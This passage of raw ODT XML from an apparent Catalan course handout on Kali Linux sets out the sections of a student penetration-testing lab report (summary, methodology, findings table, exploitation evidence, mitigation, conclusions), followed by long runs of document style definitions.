          <text:p text:style-name="P24">Objectiu (què s’havia d’aconseguir)</text:p>
        </text:list-item>
      </text:list>
      <text:h text:style-name="Heading_20_3" text:outline-level="3"><text:bookmark-start text:name="resum-executiu"/><text:bookmark-start text:name="__RefHeading___Toc1960_1837196447"/>Resum executiu<text:bookmark-end text:name="resum-executiu"/><text:bookmark-end text:name="__RefHeading___Toc1960_1837196447"/></text:h>
      <text:p text:style-name="First_20_paragraph">Un paràgraf breu (5-6 línies), <text:span text:style-name="T1">sense tecnicismes</text:span>, que resumeixi què s’ha trobat i la gravetat. Ha de ser entenedor per algú no tècnic (simula un informe real per a un “client”).</text:p>
      <text:h text:style-name="Heading_20_3" text:outline-level="3"><text:bookmark-start text:name="metodologia"/><text:bookmark-start text:name="__RefHeading___Toc1962_1837196447"/>Metodologia<text:bookmark-end text:name="metodologia"/><text:bookmark-end text:name="__RefHeading___Toc1962_1837196447"/></text:h>
      <text:p text:style-name="First_20_paragraph">Quines fases s’han seguit (reconeixement → escaneig → identificació → explotació → postexplotació) i quines eines s’han fet servir a cada una.</text:p>
      <text:h text:style-name="Heading_20_3" text:outline-level="3"><text:bookmark-start text:name="troballes"/><text:bookmark-start text:name="__RefHeading___Toc1964_1837196447"/>Troballes<text:bookmark-end text:name="troballes"/><text:bookmark-end text:name="__RefHeading___Toc1964_1837196447"/></text:h>
      <text:p text:style-name="First_20_paragraph">Per <text:span text:style-name="T1">cada vulnerabilitat trobada</text:span>, una fitxa amb:</text:p>
      <table:table table:name="Table6" table:style-name="Table6">
        <table:table-column table:style-name="Table6.A"/>
        <table:table-column table:style-name="Table6.B"/>
        <table:table-header-rows>
          <table:table-row>
            <table:table-cell table:style-name="Table6.A1" office:value-type="string">
              <text:p text:style-name="Table_20_Heading">Camp</text:p>
            </table:table-cell>
            <table:table-cell table:style-name="Table6.A1" office:value-type="string">
              <text:p text:style-name="Table_20_Heading">Contingut</text:p>
            </table:table-cell>
          </table:table-row>
        </table:table-header-rows>
        <table:table-row>
          <table:table-cell table:style-name="Table6.A1" office:value-type="string">
            <text:p text:style-name="Table_20_Contents">Nom</text:p>
          </table:table-cell>
          <table:table-cell table:style-name="Table6.A1" office:value-type="string">
            <text:p text:style-name="Table_20_Contents">p. ex. “Backdoor a vsftpd 2.3.4”</text:p>
          </table:table-cell>
        </table:table-row>
        <table:table-row>
          <table:table-cell table:style-name="Table6.A1" office:value-type="string">
            <text:p text:style-name="Table_20_Contents">Gravetat</text:p>
          </table:table-cell>
          <table:table-cell table:style-name="Table6.A1" office:value-type="string">
            <text:p text:style-name="Table_20_Contents">Crítica / Alta / Mitjana / Baixa</text:p>
          </table:table-cell>
        </table:table-row>
        <table:table-row>
          <table:table-cell table:style-name="Table6.A1" office:value-type="string">
            <text:p text:style-name="Table_20_Contents">Servei/Port afectat</text:p>
          </table:table-cell>
          <table:table-cell table:style-name="Table6.A1" office:value-type="string">
            <text:p text:style-name="Table_20_Contents">21/tcp</text:p>
          </table:table-cell>
        </table:table-row>
        <table:table-row>
          <table:table-cell table:style-name="Table6.A1" office:value-type="string">
            <text:p text:style-name="Table_20_Contents">Descripció</text:p>
          </table:table-cell>
          <table:table-cell table:style-name="Table6.A1" office:value-type="string">
            <text:p text:style-name="Table_20_Contents">Què és la vulnerabilitat</text:p>
          </table:table-cell>
        </table:table-row>
        <table:table-row>
          <table:table-cell table:style-name="Table6.A1" office:value-type="string">
            <text:p text:style-name="Table_20_Contents">Evidència</text:p>
          </table:table-cell>
          <table:table-cell table:style-name="Table6.A1" office:value-type="string">
            <text:p text:style-name="Table_20_Contents">Captura de pantalla + sortida de Nmap/Metasploit</text:p>
          </table:table-cell>
        </table:table-row>
        <text:soft-page-break/>
        <table:table-row>
          <table:table-cell table:style-name="Table6.A1" office:value-type="string">
            <text:p text:style-name="Table_20_Contents">Impacte</text:p>
          </table:table-cell>
          <table:table-cell table:style-name="Table6.A1" office:value-type="string">
            <text:p text:style-name="Table_20_Contents">Què podria fer un atacant amb això</text:p>
          </table:table-cell>
        </table:table-row>
        <table:table-row>
          <table:table-cell table:style-name="Table6.A1" office:value-type="string">
            <text:p text:style-name="Table_20_Contents">CVE (si n’hi ha)</text:p>
          </table:table-cell>
          <table:table-cell table:style-name="Table6.A1" office:value-type="string">
            <text:p text:style-name="Table_20_Contents">Referència oficial</text:p>
          </table:table-cell>
        </table:table-row>
      </table:table>
      <text:h text:style-name="Heading_20_3" text:outline-level="3"><text:bookmark-start text:name="procés-dexplotació-pas-a-pas"/><text:bookmark-start text:name="__RefHeading___Toc1966_1837196447"/>Procés d’explotació pas a pas<text:bookmark-end text:name="procés-dexplotació-pas-a-pas"/><text:bookmark-end text:name="__RefHeading___Toc1966_1837196447"/></text:h>
      <text:p text:style-name="First_20_paragraph">Ordres exactes executades, captures de cada pas, i el resultat obtingut (per exemple, la shell aconseguida amb <text:span text:style-name="CodiInline">whoami</text:span> mostrant <text:span text:style-name="CodiInline">root</text:span>).</text:p>
      <text:h text:style-name="Heading_20_3" text:outline-level="3"><text:bookmark-start text:name="recomanacions-de-mitigació"/><text:bookmark-start text:name="__RefHeading___Toc1968_1837196447"/>Recomanacions de mitigació<text:bookmark-end text:name="recomanacions-de-mitigació"/><text:bookmark-end text:name="__RefHeading___Toc1968_1837196447"/></text:h>
      <text:p text:style-name="First_20_paragraph">Per a cada troballa: com s’hauria de solucionar (actualitzar versió, tancar port, canviar contrasenya per defecte, etc.). Aquesta part és important perquè tanca el cercle atac → defensa.</text:p>
      <text:h text:style-name="Heading_20_3" text:outline-level="3"><text:bookmark-start text:name="conclusions"/><text:bookmark-start text:name="__RefHeading___Toc1970_1837196447"/>Conclusions<text:bookmark-end text:name="conclusions"/><text:bookmark-end text:name="__RefHeading___Toc1970_1837196447"/></text:h>
      <text:p text:style-name="First_20_paragraph">Valoració global de la seguretat del sistema analitzat.</text:p>
      <text:h text:style-name="Heading_20_3" text:outline-level="3"><text:a xlink:type="simple" xlink:href="https://proferamon.com/tic/pdf/informe_pentesting_metasploitable.pdf" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link"><text:bookmark-start text:name="exemple-dinforme"/><text:bookmark-start text:name="__RefHeading___Toc1972_1837196447"/><text:span text:style-name="Definition">Exemple d’informe</text:span></text:a><text:bookmark-end text:name="exemple-dinforme"/><text:bookmark-end text:name="__RefHeading___Toc1972_1837196447"/></text:h>
      <text:p text:style-name="SaltDePagina"/>
      <text:h text:style-name="Heading_20_2" text:outline-level="2"><text:bookmark-start text:name="__RefHeading___Toc1974_1837196447"/>Índex de figures<text:bookmark-end text:name="__RefHeading___Toc1974_1837196447"/></text:h>
      <text:illustration-index text:style-name="Sect1" text:protected="true" text:name="TaulaFigures">
        <text:illustration-index-source text:caption-sequence-name="Illustration" text:caption-sequence-format="text">
          <text:index-title-template text:style-name="Figure_20_Index_20_Heading"/>
          <text:illustration-index-entry-template text:style-name="Figure_20_Index_20_1">
            <text:index-entry-link-start text:style-name="Index_20_Link"/>
            <text:index-entry-text/>
            <text:index-entry-tab-stop style:type="right" style:leader-char="."/>
            <text:index-entry-page-number/>
            <text:index-entry-link-end/>
          </text:illustration-index-entry-template>
          <loext:index-source-style text:style-name="FigureCaption"/>
        </text:illustration-index-source>
        <text:index-body>
          <text:p text:style-name="P25"><text:a xlink:type="simple" xlink:href="#__RefHeading___Toc1976_1837196447" text:style-name="Index_20_Link" text:visited-style-name="Index_20_Link">Figura 1: Kali Linux logo<text:tab/>3</text:a></text:p>
          <text:p text:style-name="P25"><text:a xlink:type="simple" xlink:href="#__RefHeading___Toc1978_1837196447" text:style-name="Index_20_Link" text:visited-style-name="Index_20_Link">Figura 2: Arquitectura del laboratori de pentesting<text:tab/>8</text:a></text:p>
        </text:index-body>
      </text:illustration-index>
      <text:h text:style-name="Heading_20_4" text:outline-level="4"><text:bookmark-start text:name="versions-daquest-document"/>Versions d’aquest document<text:bookmark-end text:name="versions-daquest-document"/></text:h>
      <text:list text:style-name="L20">
        <text:list-item>
          <text:p text:style-name="P26"><text:a xlink:type="simple" xlink:href="https://proferamon.com/tic/kali.html" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link"><text:span text:style-name="Definition">HTML</text:span></text:a></text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="P26"><text:a xlink:type="simple" xlink:href="https://proferamon.com/tic/pdf/kali.pdf" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link"><text:span text:style-name="Definition">PDF</text:span></text:a></text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="P26"><text:a xlink:type="simple" xlink:href="https://proferamon.com/tic/odt/kali.odt" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link"><text:span text:style-name="Definition">ODT</text:span></text:a></text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="P26"><text:a xlink:type="simple" xlink:href="https://proferamon.com/tic/md/kali.md" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link"><text:span text:style-name="Definition">MD</text:span></text:a></text:p>
        </text:list-item>
      </text:list>
      <text:p text:style-name="First_20_paragraph"><text:a xlink:type="simple" xlink:href="https://creativecommons.org/publicdomain/zero/1.0/deed.ca" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link"><text:span text:style-name="Definition">Domini Públic (CC0)</text:span></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adornments="Normal" style:font-family-generic="swiss"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Helvetica" svg:font-family="Helvetica"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Noto Sans" svg:font-family="'Noto Sans'" style:font-adornments="Normal" style:font-family-generic="swiss" style:font-pitch="variable"/>
    <style:font-face style:name="OpenSymbol" svg:font-family="OpenSymbol" style:font-charset="x-symbol"/>
    <style:font-face style:name="Tahoma" svg:font-family="Tahoma" style:font-family-generic="system" style:font-pitch="variable"/>
    <style:font-face style:name="Ubuntu Mono" svg:font-family="'Ubuntu Mono'" style:font-adornments="Negreta" style:font-pitch="fixed"/>
    <style:font-face style:name="Ubuntu Mono1" svg:font-family="'Ubuntu Mono'" style:font-adornments="Normal" style:font-pitch="fixed"/>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ca" fo:country="none" style:letter-kerning="true" style:font-name-asian="Tahoma"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Noto Sans" fo:font-family="'Noto Sans'" style:font-style-name="Normal" style:font-family-generic="swiss" style:font-pitch="variable" fo:font-size="11pt"/>
    </style:style>
    <style:style style:name="Author" style:family="paragraph" style:parent-style-name="Standard" style:class="html">
      <style:paragraph-properties fo:text-align="center" style:justify-single-word="false"/>
    </style:style>
    <style:style style:name="Date" style:family="paragraph" style:parent-style-name="Standard" style:class="html">
      <style:paragraph-properties fo:text-align="center" style:justify-single-word="false"/>
    </style:style>
    <style:style style:name="Abstract" style:family="paragraph" style:parent-style-name="Standard" style:class="html">
      <style:paragraph-properties fo:margin-left="1cm" fo:margin-right="1cm" fo:margin-top="0.254cm" fo:margin-bottom="0.254cm" style:contextual-spacing="false" fo:text-indent="0cm" style:auto-text-indent="false"/>
    </style:style>
    <style:style style:name="Heading" style:family="paragraph" style:parent-style-name="Standard" style:next-style-name="Text_20_body" style:class="chapter">
      <style:paragraph-properties fo:margin-top="0.423cm" fo:margin-bottom="0.212cm" style:contextual-spacing="false" fo:keep-with-next="always"/>
      <style:text-properties fo:color="#e6001a" loext:opacity="100%" style:font-name="Arial" fo:font-family="Arial" style:font-style-name="Normal" style:font-family-generic="swiss" style:font-pitch="variable" fo:font-size="14pt" style:font-name-asian="Tahoma" style:font-family-asian="Tahoma"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cm" fo:margin-bottom="0.15cm" style:contextual-spacing="false" fo:line-height="115%" style:page-number="auto"/>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TableCaption" style:family="paragraph" style:parent-style-name="Caption" style:class="extra"/>
    <style:style style:name="Table" style:family="paragraph" style:parent-style-name="Caption" style:class="extra"/>
    <style:style style:name="FigureCaption" style:family="paragraph" style:parent-style-name="Caption" style:class="extra">
      <style:paragraph-properties fo:text-align="center" style:justify-single-word="false"/>
    </style:style>
    <style:style style:name="Figure" style:family="paragraph" style:parent-style-name="Standard" style:class="extra">
      <style:paragraph-properties fo:text-align="center" style:justify-single-word="false" text:number-lines="false" text:line-number="0"/>
    </style:style>
    <style:style style:name="FigureWithCaption" style:family="paragraph" style:parent-style-name="Figure" style:class="extra">
      <style:paragraph-properties fo:keep-with-next="always" text:number-lines="false" text:line-number="0"/>
    </style:style>
    <style:style style:name="Index" style:family="paragraph" style:parent-style-name="Standard" style:class="index" style:master-page-name="">
      <style:paragraph-properties fo:line-height="115%" style:page-number="auto" text:number-lines="false" text:line-number="0"/>
      <style:text-properties style:font-size-asian="12pt" style:font-name-complex="FreeSans" style:font-family-complex="FreeSans" style:font-family-generic-complex="swiss"/>
    </style:style>
    <style:style style:name="Heading_20_1" style:display-name="Heading 1" style:family="paragraph" style:parent-style-name="Heading" style:next-style-name="Text_20_body" style:default-outline-level="1" style:class="chapter">
      <loext:graphic-properties draw:fill="solid" draw:fill-color="#ffd7d7"/>
      <style:paragraph-properties fo:margin-top="0.423cm" fo:margin-bottom="0.212cm" style:contextual-spacing="false" fo:background-color="#ffd7d7" fo:padding="0.049cm" fo:border-left="none" fo:border-right="none" fo:border-top="1.56pt solid #e6001a" fo:border-bottom="non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10%"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chapter">
      <style:paragraph-properties fo:margin-top="0.247cm" fo:margin-bottom="0.212cm" style:contextual-spacing="false"/>
      <style:text-properties fo:font-size="101%" fo:font-weight="normal"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95%" fo:font-style="italic" fo:font-weight="normal" style:font-size-asian="95%" style:font-style-asian="italic" style:font-weight-asian="bold" style:font-size-complex="95%" style:font-style-complex="italic" style:font-weight-complex="normal"/>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normal"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1cm" fo:margin-right="1cm" fo:margin-top="0.254cm" fo:margin-bottom="0.254cm" style:contextual-spacing="false" fo:text-indent="0cm" style:auto-text-indent="false"/>
    </style:style>
    <style:style style:name="Preformatted_20_Text" style:display-name="Preformatted Text" style:family="paragraph" style:parent-style-name="Standard" style:class="html">
      <loext:graphic-properties draw:fill="solid" draw:fill-color="#f5f5f5"/>
      <style:paragraph-properties fo:margin-top="0cm" fo:margin-bottom="0cm" style:contextual-spacing="true" fo:background-color="#f5f5f5" fo:padding="0.15cm" fo:border-left="2.49pt solid #4a90d9" fo:border-right="none" fo:border-top="none" fo:border-bottom="none"/>
      <style:text-properties fo:color="#2d2d2d" loext:opacity="100%" style:font-name="Ubuntu Mono1" fo:font-family="'Ubuntu Mono'" style:font-style-name="Normal" style:font-pitch="fixed" fo:font-size="10pt" fo:language="ca" fo:country="none"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Codi_20_Ini" style:display-name="Codi Ini" style:family="paragraph" style:parent-style-name="Standard" style:master-page-name="">
      <loext:graphic-properties draw:fill="solid" draw:fill-color="#f0faf0"/>
      <style:paragraph-properties fo:margin-top="0cm" fo:margin-bottom="0cm" style:contextual-spacing="true" style:page-number="auto" fo:background-color="#f0faf0" fo:padding="0.15cm" fo:border-left="2.49pt solid #2d7a4f" fo:border-right="none" fo:border-top="none" fo:border-bottom="none"/>
      <style:text-properties fo:color="#1e3a5f" loext:opacity="100%" style:font-name="Ubuntu Mono1" fo:font-family="'Ubuntu Mono'" style:font-style-name="Normal" style:font-pitch="fixed" fo:font-size="10pt" fo:language="ca" fo:country="none"/>
    </style:style>
    <style:style style:name="Codi_20_Nano" style:display-name="Codi Nano" style:family="paragraph" style:parent-style-name="Standard" style:master-page-name="">
      <loext:graphic-properties draw:fill="solid" draw:fill-color="#eeeedd"/>
      <style:paragraph-properties fo:margin-top="0cm" fo:margin-bottom="0cm" style:contextual-spacing="true" style:page-number="auto" fo:background-color="#eeeedd" fo:padding="0.15cm" fo:border-left="2.49pt solid #e94560" fo:border-right="none" fo:border-top="none" fo:border-bottom="none"/>
      <style:text-properties fo:color="#2d2d2d" loext:opacity="100%" style:font-name="Ubuntu Mono1" fo:font-family="'Ubuntu Mono'" style:font-style-name="Normal" style:font-pitch="fixed" fo:font-size="10pt" fo:language="ca" fo:country="none"/>
    </style:style>
    <style:style style:name="Definition_20_Term" style:display-name="Definition Term" style:family="paragraph" style:parent-style-name="Standard" style:next-style-name="Definition_20_Definition">
      <style:paragraph-properties fo:margin-top="0.152cm" fo:margin-bottom="0.152cm" style:contextual-spacing="false"/>
    </style:style>
    <style:style style:name="Definition_20_Definition" style:display-name="Definition Definition" style:family="paragraph" style:parent-style-name="Standard" style:next-style-name="Text_20_body">
      <style:paragraph-properties fo:margin-left="1.27cm" fo:margin-right="0cm" fo:text-indent="0cm" style:auto-text-indent="false"/>
    </style:style>
    <style:style style:name="Table_20_Contents" style:display-name="Table Contents" style:family="paragraph" style:parent-style-name="Standard" style:class="extra" style:master-page-name="">
      <style:paragraph-properties fo:margin-top="0.199cm" fo:margin-bottom="0.199cm" style:contextual-spacing="true" fo:orphans="0" fo:widows="0" style:page-number="auto"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fo:font-size="8pt"/>
    </style:style>
    <style:style style:name="Definition_20_Term_20_Tight" style:display-name="Definition Term Tight" style:family="paragraph" style:parent-style-name="Standard" style:next-style-name="Definition_20_Definition_20_Tight">
      <style:paragraph-properties fo:margin-top="0.203cm" fo:margin-bottom="0.203cm" style:contextual-spacing="false"/>
    </style:style>
    <style:style style:name="Definition_20_Definition_20_Tight" style:display-name="Definition Definition Tight" style:family="paragraph" style:parent-style-name="Standard">
      <style:paragraph-properties fo:margin-left="1.27cm" fo:margin-right="0cm" fo:margin-top="0cm" fo:margin-bottom="0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itle" style:family="paragraph" style:parent-style-name="Heading" style:next-style-name="Text_20_body" style:class="chapter">
      <style:paragraph-properties fo:text-align="start" style:justify-single-word="false"/>
      <style:text-properties style:font-name="Arial" fo:font-family="Arial" style:font-style-name="Normal" style:font-family-generic="swiss" style:font-pitch="variable" fo:font-size="28pt" fo:font-weight="normal" style:font-size-asian="28pt" style:font-weight-asian="bold" style:font-size-complex="28pt" style:font-weight-complex="bold"/>
    </style:style>
    <style:style style:name="Codi_20_font" style:display-name="Codi font" style:family="paragraph" style:parent-style-name="Text_20_body" style:master-page-name="">
      <loext:graphic-properties draw:fill="solid" draw:fill-color="#ffffd7"/>
      <style:paragraph-properties fo:margin-top="0.101cm" fo:margin-bottom="0.101cm" style:contextual-spacing="false" fo:line-height="100%" style:page-number="auto" fo:background-color="#ffffd7" fo:padding="0.049cm" fo:border="0.06pt solid #ff972f"/>
      <style:text-properties fo:color="#000000" loext:opacity="100%" style:font-name="Ubuntu Mono1" fo:font-family="'Ubuntu Mono'" style:font-style-name="Normal" style:font-pitch="fixed" fo:language="ca" fo:country="non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Nota" style:family="paragraph" style:parent-style-name="Text_20_body" style:master-page-name="">
      <loext:graphic-properties draw:fill="solid" draw:fill-color="#ffff6d"/>
      <style:paragraph-properties fo:margin-left="0.499cm" fo:margin-right="0.499cm" fo:margin-top="0.15cm" fo:margin-bottom="0.15cm" style:contextual-spacing="true" fo:text-indent="0cm" style:auto-text-indent="false" style:page-number="auto" fo:background-color="#ffff6d" fo:padding="0.199cm" fo:border-left="7.99pt solid #ff972f" fo:border-right="none" fo:border-top="none" fo:border-bottom="none" style:shadow="#784b04 0.176cm 0.176cm"/>
      <style:text-properties fo:color="#000000" loext:opacity="100%"/>
    </style:style>
    <style:style style:name="Terminal" style:family="paragraph" style:parent-style-name="Codi_20_font" style:master-page-name="">
      <loext:graphic-properties draw:fill="solid" draw:fill-color="#333333"/>
      <style:paragraph-properties fo:margin-top="0.199cm" fo:margin-bottom="0.199cm" style:contextual-spacing="true" style:page-number="auto" fo:background-color="#333333" fo:padding="0.049cm" fo:border="none"/>
      <style:text-properties fo:color="#afd095" loext:opacity="100%"/>
    </style:style>
    <style:style style:name="SaltDePagina" style:family="paragraph" style:parent-style-name="Standard">
      <style:paragraph-properties fo:margin-top="0cm" fo:margin-bottom="0cm" style:contextual-spacing="false" fo:line-height="0.049cm" fo:break-before="page"/>
      <style:text-properties fo:font-size="1pt"/>
    </style:style>
    <style:style style:name="AlertNota" style:family="paragraph" style:parent-style-name="Text_20_body" style:master-page-name="">
      <loext:graphic-properties draw:fill="solid" draw:fill-color="#eff6ff" draw:opacity="100%"/>
      <style:paragraph-properties fo:margin-top="0cm" fo:margin-bottom="0.25cm" style:contextual-spacing="true" style:page-number="auto" fo:background-color="#eff6ff" fo:padding="0.25cm" fo:border-left="3pt solid #3b82f6" fo:border-right="none" fo:border-top="none" fo:border-bottom="none"/>
    </style:style>
    <style:style style:name="AlertNotaEtiqueta" style:family="paragraph" style:parent-style-name="AlertNota">
      <style:paragraph-properties fo:margin-top="0.25cm" fo:margin-bottom="0.101cm" style:contextual-spacing="false"/>
      <style:text-properties fo:color="#1d4ed8" loext:opacity="100%" fo:font-size="9pt" fo:font-weight="bold"/>
    </style:style>
    <style:style style:name="AlertConsell" style:family="paragraph" style:parent-style-name="Text_20_body" style:master-page-name="">
      <loext:graphic-properties draw:fill="solid" draw:fill-color="#f0fdf4" draw:opacity="100%"/>
      <style:paragraph-properties fo:margin-top="0cm" fo:margin-bottom="0.25cm" style:contextual-spacing="true" style:page-number="auto" fo:background-color="#f0fdf4" fo:padding="0.25cm" fo:border-left="3pt solid #22c55e" fo:border-right="none" fo:border-top="none" fo:border-bottom="none"/>
    </style:style>
    <style:style style:name="AlertConsellEtiqueta" style:family="paragraph" style:parent-style-name="AlertConsell">
      <style:paragraph-properties fo:margin-top="0.25cm" fo:margin-bottom="0.101cm" style:contextual-spacing="false"/>
      <style:text-properties fo:color="#15803d" loext:opacity="100%" fo:font-size="9pt" fo:font-weight="bold"/>
    </style:style>
    <style:style style:name="AlertImportant" style:family="paragraph" style:parent-style-name="Text_20_body" style:master-page-name="">
      <loext:graphic-properties draw:fill="solid" draw:fill-color="#faf5ff" draw:opacity="100%"/>
      <style:paragraph-properties fo:margin-top="0cm" fo:margin-bottom="0.25cm" style:contextual-spacing="true" style:page-number="auto" fo:background-color="#faf5ff" fo:padding="0.25cm" fo:border-left="3pt solid #a855f7" fo:border-right="none" fo:border-top="none" fo:border-bottom="none"/>
    </style:style>
    <style:style style:name="AlertImportantEtiqueta" style:family="paragraph" style:parent-style-name="AlertImportant">
      <style:paragraph-properties fo:margin-top="0.25cm" fo:margin-bottom="0.101cm" style:contextual-spacing="false"/>
      <style:text-properties fo:color="#7e22ce" loext:opacity="100%" fo:font-size="9pt" fo:font-weight="bold"/>
    </style:style>
    <style:style style:name="AlertAvis" style:family="paragraph" style:parent-style-name="Text_20_body" style:master-page-name="">
      <loext:graphic-properties draw:fill="solid" draw:fill-color="#fffbeb" draw:opacity="100%"/>
      <style:paragraph-properties fo:margin-top="0cm" fo:margin-bottom="0.25cm" style:contextual-spacing="true" style:page-number="auto" fo:background-color="#fffbeb" fo:padding="0.25cm" fo:border-left="3pt solid #f59e0b" fo:border-right="none" fo:border-top="none" fo:border-bottom="none"/>
    </style:style>
    <style:style style:name="AlertAvisEtiqueta" style:family="paragraph" style:parent-style-name="AlertAvis">
      <style:paragraph-properties fo:margin-top="0.25cm" fo:margin-bottom="0.101cm" style:contextual-spacing="false"/>
      <style:text-properties fo:color="#b45309" loext:opacity="100%" fo:font-size="9pt" fo:font-weight="bold"/>
    </style:style>
    <style:style style:name="AlertPrecaucio" style:family="paragraph" style:parent-style-name="Text_20_body" style:master-page-name="">
      <loext:graphic-properties draw:fill="solid" draw:fill-color="#fff1f2" draw:opacity="100%"/>
      <style:paragraph-properties fo:margin-top="0cm" fo:margin-bottom="0.25cm" style:contextual-spacing="true" style:page-number="auto" fo:background-color="#fff1f2" fo:padding="0.25cm" fo:border-left="3pt solid #ef4444" fo:border-right="none" fo:border-top="none" fo:border-bottom="none"/>
    </style:style>
    <style:style style:name="AlertPrecaucioEtiqueta" style:family="paragraph" style:parent-style-name="AlertPrecaucio">
      <style:paragraph-properties fo:margin-top="0.25cm" fo:margin-bottom="0.101cm" style:contextual-spacing="false"/>
      <style:text-properties fo:color="#b91c1c" loext:opacity="100%" fo:font-size="9pt" fo:font-weight="bold"/>
    </style:style>
    <style:style style:name="Figure_20_Index_20_1" style:display-name="Figure Index 1" style:family="paragraph" style:parent-style-name="Index" style:class="index">
      <style:paragraph-properties fo:margin-left="0cm" fo:text-indent="0cm" style:auto-text-indent="false">
        <style:tab-stops>
          <style:tab-stop style:position="17cm" style:type="right" style:leader-style="dotted" style:leader-text="."/>
        </style:tab-stops>
      </style:paragraph-properties>
    </style:style>
    <style:style style:name="CodiInline" style:family="text">
      <style:text-properties style:font-name="Ubuntu Mono1" fo:font-family="'Ubuntu Mono'" style:font-style-name="Normal" style:font-pitch="fixed" fo:font-size="10pt" fo:language="ca" fo:country="none" fo:background-color="#f5f5f5" loext:padding="0.03cm" loext:border="0.51pt solid #cccccc"/>
    </style:style>
    <style:style style:name="Source_5f_Text" style:display-name="Source_Text" style:family="text">
      <style:text-properties style:font-name="Ubuntu Mono" fo:font-family="'Ubuntu Mono'" style:font-style-name="Negreta" style:font-pitch="fixed" fo:font-size="12pt" fo:language="ca" fo:country="none" fo:font-weight="bold"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style:style>
    <style:style style:name="Highlighted" style:family="text">
      <style:text-properties fo:background-color="#ffff38"/>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text-line-through-type="single"/>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Internet_20_link" style:display-name="Internet link" style:family="text">
      <style:text-properties fo:color="#000080" loext:opacity="100%" fo:language="ca"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style:style style:name="Source_20_Text" style:display-name="Source Text" style:family="text">
      <style:text-properties style:font-name="Ubuntu Mono1" fo:font-family="'Ubuntu Mono'" style:font-style-name="Normal" style:font-pitch="fixed" fo:font-size="11pt" fo:language="ca" fo:country="none" fo:background-color="#ffffd7" style:font-name-asian="Liberation Mono" style:font-family-asian="'Liberation Mono'" style:font-family-generic-asian="modern" style:font-pitch-asian="fixed" style:font-name-complex="Liberation Mono" style:font-family-complex="'Liberation Mono'" style:font-family-generic-complex="modern" style:font-pitch-complex="fixed" loext:padding="0.049cm" loext:border="0.06pt solid #ff972f"/>
    </style:style>
    <style:style style:name="Index_20_Link" style:display-name="Index Link" style:family="text"/>
    <style:style style:name="Text_20_Terminal" style:display-name="Text Terminal" style:family="text" style:parent-style-name="Source_20_Text">
      <style:text-properties fo:color="#afd095" loext:opacity="100%" fo:background-color="#333333" loext:padding="0.049cm" loext:border="0.06pt solid #729fcf"/>
    </style:style>
    <style:style style:name="KeywordTok" style:family="text">
      <style:text-properties fo:color="#204a87" loext:opacity="100%" fo:font-weight="bold"/>
    </style:style>
    <style:style style:name="DataTypeTok" style:family="text">
      <style:text-properties fo:color="#204a87" loext:opacity="100%"/>
    </style:style>
    <style:style style:name="DecValTok" style:family="text">
      <style:text-properties fo:color="#0000cf" loext:opacity="100%"/>
    </style:style>
    <style:style style:name="BaseNTok" style:family="text">
      <style:text-properties fo:color="#0000cf" loext:opacity="100%"/>
    </style:style>
    <style:style style:name="FloatTok" style:family="text">
      <style:text-properties fo:color="#0000cf" loext:opacity="100%"/>
    </style:style>
    <style:style style:name="ConstantTok" style:family="text">
      <style:text-properties fo:color="#8f5902" loext:opacity="100%"/>
    </style:style>
    <style:style style:name="CharTok" style:family="text">
      <style:text-properties fo:color="#4e9a06" loext:opacity="100%"/>
    </style:style>
    <style:style style:name="SpecialCharTok" style:family="text">
      <style:text-properties fo:color="#ce5c00" loext:opacity="100%" fo:font-weight="bold"/>
    </style:style>
    <style:style style:name="StringTok" style:family="text">
      <style:text-properties fo:color="#4e9a06" loext:opacity="100%"/>
    </style:style>
    <style:style style:name="VerbatimStringTok" style:family="text">
      <style:text-properties fo:color="#4e9a06" loext:opacity="100%"/>
    </style:style>
    <style:style style:name="SpecialStringTok" style:family="text">
      <style:text-properties fo:color="#4e9a06" loext:opacity="100%"/>
    </style:style>
    <style:style style:name="ImportTok" style:family="text"/>
    <style:style style:name="CommentTok" style:family="text">
      <style:text-properties fo:color="#8f5902" loext:opacity="100%" fo:font-style="italic"/>
    </style:style>
    <style:style style:name="DocumentationTok" style:family="text">
      <style:text-properties fo:color="#8f5902" loext:opacity="100%" fo:font-style="italic" fo:font-weight="bold"/>
    </style:style>
    <style:style style:name="AnnotationTok" style:family="text">
      <style:text-properties fo:color="#8f5902" loext:opacity="100%" fo:font-style="italic" fo:font-weight="bold"/>
    </style:style>
    <style:style style:name="CommentVarTok" style:family="text">
      <style:text-properties fo:color="#8f5902" loext:opacity="100%" fo:font-style="italic" fo:font-weight="bold"/>
    </style:style>
    <style:style style:name="OtherTok" style:family="text">
      <style:text-properties fo:color="#8f5902" loext:opacity="100%"/>
    </style:style>
    <style:style style:name="FunctionTok" style:family="text">
      <style:text-properties fo:color="#204a87" loext:opacity="100%" fo:font-weight="bold"/>
    </style:style>
    <style:style style:name="VariableTok" style:family="text">
      <style:text-properties fo:color="#000000" loext:opacity="100%"/>
    </style:style>
    <style:style style:name="ControlFlowTok" style:family="text">
      <style:text-properties fo:color="#204a87" loext:opacity="100%" fo:font-weight="bold"/>
    </style:style>
    <style:style style:name="OperatorTok" style:family="text">
      <style:text-properties fo:color="#ce5c00" loext:opacity="100%" fo:font-weight="bold"/>
    </style:style>
    <style:style style:name="BuiltInTok" style:family="text"/>
    <style:style style:name="ExtensionTok" style:family="text"/>
    <style:style style:name="PreprocessorTok" style:family="text">
      <style:text-properties fo:color="#8f5902" loext:opacity="100%" fo:font-style="italic"/>
    </style:style>
    <style:style style:name="AttributeTok" style:family="text">
      <style:text-properties fo:color="#204a87" loext:opacity="100%"/>
    </style:style>
    <style:style style:name="RegionMarkerTok" style:family="text"/>
    <style:style style:name="InformationTok" style:family="text">
      <style:text-properties fo:color="#8f5902" loext:opacity="100%" fo:font-style="italic" fo:font-weight="bold"/>
    </style:style>
    <style:style style:name="WarningTok" style:family="text">
      <style:text-properties fo:color="#8f5902" loext:opacity="100%" fo:font-style="italic" fo:font-weight="bold"/>
    </style:style>
    <style:style style:name="AlertTok" style:family="text">
      <style:text-properties fo:color="#ef2929" loext:opacity="100%"/>
    </style:style>
    <style:style style:name="ErrorTok" style:family="text">
